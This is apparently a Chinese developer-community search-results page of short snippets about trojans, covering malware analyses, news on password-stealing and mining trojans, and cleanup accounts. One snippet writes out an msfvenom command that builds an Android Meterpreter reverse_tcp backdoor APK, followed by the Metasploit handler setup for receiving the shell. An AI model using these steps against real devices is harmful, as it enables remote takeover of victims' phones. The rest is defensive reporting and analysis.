展开

关键词

CTF实战23 木马攻击技术

什么是特洛伊木马 特诺伊木马概述 历史上 特洛伊木马木马屠城记里,希腊军队在特洛伊战争中,用来攻破特洛伊城的那只大木马 值得注意的是,木马屠城记并非于古希腊诗人荷马的两部著作伊利亚特与奥德赛里记载,而是在罗马帝国时期的诗人维吉尔所写的史诗 与病毒相似,木马程序有很强的隐秘性,随操作系统启动而启动 特洛伊木马(简称木马)是恶意软件执行意外或未经授权的恶意的行为 木马和病毒之间的主要区别是无法复制 木马造成损害的系统,降低系统的安全性,但不复制 如果它复制,那么它应该被归类为病毒 木马的结构 一般的,木马是由传统的C&S架构组成的,其一般由 配置木马程序 控制木马程序 木马自身程序 三部分组成 木马网路入侵的方法 第一步、黑客制作和测试完成木马程序之后 而反向型的这类木马的通信是由木马服务端(运行了木马的PC)发起的,现在的木马多属于这种类型 这是因为防火墙对进入计算机的数据会严查,流出计算机的数据却很少检查 2. 按功能分类 按照这种分类方法,我们可以把木马分为以下几种: 键盘记录型( Keyloggers ) DoS攻击型( Denial of Service ) 释放型( Droppers) 下载型(Downloaders

46520

黑蛙木马攻击64位系统

专业人员检测发现,该电脑感染了一种名为“黑蛙”的盗号木马,而他使用的杀毒软件只适合32位系统。   64位系统比32位的运算性能更强大,支持更高的内存配置,但是其软件兼容性还有待完善。 据了解,在32位系统下,多数安全软件可以拦截“黑蛙”木马;而支持64位系统实时防护的安全软件并不多。   据悉,“黑蛙”是攻击32位和64位系统的“两栖”盗号木马,在64位系统上尤其危险。 当再登录QQ时,弹出的登录界面其实已经被木马替换,而他输入的QQ密码直接提交到了“黑蛙”木马后台。   据网络安全机构统计,随着64位Win7/8的加速普及,专门攻击64位Windows系统的木马和病毒也数量剧增。在黑客论坛上,破坏64位系统上安全软件的攻击方法已经公开。 传统安全技术在64位系统无法实现高强度的实时防护,只有应用Intel/AMD CPU硬件虚拟化技术,安全软件在64位系统上才能真正防住木马病毒。

45840
  • 广告
    关闭

    《云安全最佳实践-创作者计划》火热征稿中

    发布文章赢千元好礼!

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    揭秘Agent Tesla间谍木马攻击活动

    近日,亚信安全截获多个垃圾邮件的攻击活动,这些攻击活动使用的邮件附件通常是伪装成系统镜像ISO文件(亚信安全检测为Mal_GENISO)以及RAR和LZH压缩文档,其中包括使用AutoIt编译和.NET 编译的Agent Tesla间谍木马(也被称为Negasteal),亚信安全命名为TrojanSpy.MSIL.NEGASTEAL.KBE。 详细分析 近期截获的攻击活动对比: 攻击时间 2019年10月 2019年11月--12月 编译方式 AutoIT编译 .NET编译 传播方式 垃圾邮件 垃圾邮件 恶意行为 间谍木马 窃取信息 间谍木马 Agent Tesla间谍木马攻击流程 ? 本次邮件攻击活动是批量生成和分发的,我们收到大量的带有ISO镜像附件的相关垃圾邮件,可以通过直接解压缩ISO镜像文件的方式获取到木马母体文件,具体如下所示: ? ?

    45130

    源代码特洛伊木马攻击

    攻击者可以利用这一点对接受 Unicode 的编译器的源代码进行编码,从而将目标漏洞引入人类审查者不可见的地方。 除此之外,支持Unicode还可以出现很多其它的攻击,尤其是通过一些“不可见字符”,或是通过“同形字符”在源代码里面埋坑。

    12330

    内网穿透:Android木马进入高级攻击阶段

    三.详细分析 该木马的主要攻击过程如下[3]: (1)木马运行时主动连接到攻击者主机(SOCKS客户端),建立一个与攻击者对话的代理通道。 (2)作为SOCKS服务端的木马根据攻击者传来的目标内网服务器的IP地址和端口,连接目标应用服务器。 (3)木马攻击者和应用服务器之间转发数据,进行通信。 SOCKS客户端,攻击者与处于内网中的木马程序建立了信息传输的通道了。 应用服务器收到HTTP请求后,将HTTP应答数据发送给木马木马检查到应答数据,马上转发给攻击者,这样攻击者就通过木马完成了对内网HTTP服务器的访问。 这样攻击者就通过木马完成了对内网文件服务器的数据窃取。 以上攻击过程如下图所示: ?

    671100

    HTTPS劫匪木马暴力升级:破坏ARK攻击杀软

    而作为对立面的流量劫持攻击,也开始将矛头对准HTTPS,其中最常见的一种方法便是伪造证书,做中间人劫持。 近日,360互联网安全中心又发现一款名为“跑跑火神多功能辅助”的外挂软件中附带的劫持木马,该木马可以看作是之前劫持木马的加强版,其运行后加载RootKit木马驱动大肆劫持导航及电商网站,利用中间人攻击手法劫持 ,HTTPS劫匪也把360急救箱列为攻击目标。 图8 3、进行流量劫持 木马会云控劫持导航及电商网站,利用中间人攻击手法,支持劫持https网站 ? 图9 中间人攻击示意图 驱动调用BlackBone代码将yyqg.dll注入到winlogon.exe进程中执行, ? 图10 BlackBone相关代码: ?

    55180

    服务器被挖矿木马攻击该怎么处理

    正月里来是新年,刚开始上班我们SINE安全团队,首次挖掘发现了一种新的挖矿木马,感染性极强,穿透内网,自动尝试攻击服务器以及其他网站,通过我们一系列的追踪,发现了攻击者的特征,首先使用thinkphp远程代码执行漏洞 这个挖矿木马我们可以命名为猪猪挖矿,之所以这样起名也是觉得攻击的特征,以及繁衍感染的能力太强,我们称之为猪猪挖矿木马。 关于如何检测以及防护挖矿木马,我们通过这篇文章来给大家讲解一下,希望大家能够日后遇到服务器被挖矿木马攻击的时候可以应急处理,让损失降到最低。 ? 挖矿木马是2018年底开始大批量爆发的,我们对猪猪挖矿进行了详细的跟踪与追查分析,主要是通过thinkphp的网站漏洞进行攻击服务器,然后在服务器里置入木马后门,以及挖矿木马,该木马的特征如下:内置了许多木马后门 针对服务器被挖矿木马攻击的处理及安全解决方案 尽快的升级thinkphp系统的版本,检测网站源代码里是否留有攻击者留下的木马后门,对网站开启硬件防火墙,随时的检测攻击,使用其他网站开源系统的运营者,建议尽快升级网站系统到最新版本

    1.1K20

    服务器被挖矿木马攻击该怎么处理

    正月里来是新年,刚开始上班我们SINE安全团队,首次挖掘发现了一种新的挖矿木马,感染性极强,穿透内网,自动尝试攻击服务器以及其他网站,通过我们一系列的追踪,发现了攻击者的特征,首先使用thinkphp远程代码执行漏洞 这个挖矿木马我们可以命名为猪猪挖矿,之所以这样起名也是觉得攻击的特征,以及繁衍感染的能力太强,我们称之为猪猪挖矿木马。 关于如何检测以及防护挖矿木马,我们通过这篇文章来给大家讲解一下,希望大家能够日后遇到服务器被挖矿木马攻击的时候可以应急处理,让损失降到最低。 挖矿木马是2018年底开始大批量爆发的,我们对猪猪挖矿进行了详细的跟踪与追查分析,主要是通过thinkphp的网站漏洞进行攻击服务器,然后在服务器里置入木马后门,以及挖矿木马,该木马的特征如下:内置了许多木马后门 针对服务器被挖矿木马攻击的处理及安全解决方案 尽快的升级thinkphp系统的版本,检测网站源代码里是否留有攻击者留下的木马后门,对网站开启硬件防火墙,随时的检测攻击,使用其他网站开源系统的运营者,建议尽快升级网站系统到最新版本

    52910

    蓝光光盘攻击:利用蓝光光盘植入恶意木马

    近日,英国安全研究人员Stephen Tomkinson发现两个基于蓝光光盘的攻击方法,通过将恶意文件存植入到蓝光光盘中,在光驱转动时读取光盘中的恶意代码发起感染电脑、网络攻击等恶意活动。 近日,NCC集团安全专家Stephen Tomkinson在播放蓝光光盘的软件上发现了两个漏洞,利用这些漏洞可以将木马植入到使用受影响设备的电脑上。 Tomkinson制作了一个蓝光光盘,利用此光盘可以检测光盘播放器的类型,使用其中的一个漏洞利用代码可以为主机上的木马提供恶意服务。 第二个漏洞会影响一些蓝光光盘播放器的硬件,这种攻击需要依靠由黑客Malcolm Stagg开发的一个利用代码,该代码利用了从外部USB设备中启动调试代码的特点,使得攻击者有机会获取到蓝光光盘播放器的root 类似攻击事件 本文中提到的攻击让我们想到了攻击组织“方程式”(Freebuf相关报道)曾经使用的攻击技术,即他们入侵休士顿举行的一次科学会议参与者电脑时所使用的方法。

    39060

    新型PPT钓鱼攻击分析(含gootkit木马详细分析)

    1 概述 最近出现了一种新型的PPT钓鱼攻击方式,该种钓鱼攻击方式不需要宏就能实现执行powershell的功能,通过网络下载gootkit木马进行控制。 2 分析 样本 MD5:3bff3e4fec2b6030c89e792c05f049fc 在拿到样本我们放到虚拟机中进行执行,可以看到以下,但是这并不会触发攻击 当我们用F5放映这个文档后,并把鼠标放到

    61640

    服务器防黑客及木马攻击的安全设置小结

    很多情况下,我们使用服务器最重要的就是服务器安全设置,要不你的网站数据很容易就被别人复制走,服务器变成肉鸡,让你损失惨重,这里简单分享下,随时是2000的安全设...

    31700

    挖矿木马z0Miner正利用Confluence漏洞发起攻击

    近日,趋势科技发现挖矿木马 z0Miner 一直在利用 Atlassian 的 Confluence 远程代码执行漏洞(CVE-2021-26084)。 去年年底,z0Miner 被发现利用 Oracle 的 WebLogic 远程代码执行漏洞(CVE-2020-14882)发起攻击。 从那以后,z0Miner 被发现多次利用各种 RCE 漏洞发起攻击,例如 CVE-2015-1427。 感染链 根据调查,利用 CVE-2021-26084 漏洞的感染链与此前类似。

    40420

    新型银行木马正通过Google Play商店攻击英国银行用户

    据Security Affairs消息,荷兰安全公司Threat Fabric的研究人员发现了一种名为 Xenomorph的新 Android 银行木马,目前已通过谷歌官方应用商店官方 Google Play 安全研究人员认为,Xenomorph与另一款名叫Alien的银行木马在功能上虽有不同,但也存在颇多相似之处,推测这两种恶意软件可能是由同一开发者所为。 Alien 于 2020 年 9 月被 Threat Fabric 发现,是一种远程访问木马 (RAT),具有通知嗅探和基于身份验证器的 2FA 盗窃功能。

    13020

    记一次服务器被挖矿木马攻击的经历

    背景 ---- 利用空余时间买了台服务器做了个小网站玩,今天访问了一下,加载巨慢,一看服务器运行情况,CPU飙到100%,按CPU消耗排序,排在第一的是一个名为“imWBR1”的进程,查了一下是一个挖矿木马 木马来历 ---- 最后说下,这个木马是怎么进来的呢,查了一下原来是利用Redis端口漏洞进来的,它可以对未授权访问redis的服务器登录,定时下载并执行脚本,脚本下载imWBR1和ddg文件并运行,imWBR1 参考文章: 1、清除wnTKYg 这个挖矿工木马的过程讲述 2、比特币挖矿木马Ddg分析 【 转载请注明出处——胡玉洋《记一次服务器被挖矿木马攻击的经历》】

    1.5K30

    木马伪装-后门木马变形记

    打开metasploit开启监听模式,当被攻击装双击打开该图片后,可看到鱼儿上线啦 ? 最后:伪装的木马虽然骗的了我们的眼睛,但是骗不过杀毒软件,只有免杀的木马穿上这件马夹才能碰撞出更激情的火花,实现华丽转身。

    74220

    木马msfpayload

    安卓木马后门:msfvenom -p Android/Meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk win的木马后门就是 启动 msfconsole 设置use Exploit/multi/handler set payload android/meterpreter/reverse_tcp show options 木马触发地址

    10620

    网站源文件被注入了iframe代码—ARP欺骗的木马病毒攻击

    于是询问服务器管理员含笑,他一听就说:“是中ARP欺骗的病毒攻击了”。 那么什么是“ARP欺骗”呢? 而 本次我的网站服务器所在的托管机房同一局域网中的某台服务器即被感染了ARP欺骗木马,所以就影响了整个机房的其他服务器,于是服务器中成千上万的虚拟主 机网站就全部遭殃了,木马种植者站点访问量也是猛增,这还是小事 继 续执行命令“arp -a”,查看默认网关IP对应的“Physical Address”值,在网络正常时这就是网关的正确物理地址,在网络受“ ARP 欺骗”木马影响而不正常时,它就是木马所在计算机的网卡物理地址 www.nuqx.com/downcenter.asp ARP解决方法/工具+真假ARP防范区别方法+ARP终极解决方案 http://www.txwm.com/BBS384837.vhtml ARP攻击防范与解决方案专题 http://www.luxinjie.com/s/arp/ 查看完整的网站源文件被注入了iframe代码—ARP欺骗的木马病毒攻击内容,或者用Google搜索相关的更多内容

    68360

    网站被攻击被跳转到了博彩网的木马清理过程记录

    通过服务器的SINESAFE木马查杀工具,查杀出多个变形的webshell,以及隐藏属性无法删除的木马文件,本地扫描两个上传文件,火绒均报毒。 ? 我这才明白过来,原来是我网站被黑了。 赶紧打开服务器里的各个站点,下载网站程序代码到本地,然后挨个对每一个代码进行查看,查看是不是网站被黑客植入了木马后门,果不其然在每个网站根目录里的conn.php发现了黑客插入的恶意代码: functiongo_bots_url 去除掉恶意代码后,网站从百度搜索点击进来的也正常显示了,真是太无耻了,在服务器中查看隐藏属性的文件普通肉眼是看不到的,需要用专门的SINESAFE木马查杀工具才能看到,怪不得我找了大半天都没找到问题根源 接下来的工作就是抓紧修复网站漏洞,以及对服务器上的所有站点进行排查和漏洞修复,防止被再次攻击跳转,如果大家对程序代码不太熟悉无法修复漏洞的话可以到网站安全公司去看看。

    21920

    Kronos银行木马被发现,疑似新版Osiris木马

    根据Proofpoint安全研究人员的说法,新版本的Kronos银行木马正蠢蠢欲动,研究人员证实,最近三次宣传这个旧木马的翻新版本在2014年经历了鼎盛时期。 Kronos 2018版可能是新版Osiris木马 研究人员说,与此同时,这种新的Kronos变种开始出现在他们的雷达上,一名恶意软件作者开始在黑客论坛上宣传一种新的银行木马,他称之为Osiris。 最大的线索是这个新特洛伊木马的作者声称他的木马只有350 KB大小,接近于早期Kronos 2018版样本——研究人员4月份发现的(351 KB)大小。

    28250

    扫码关注腾讯云开发者

    领取腾讯云代金券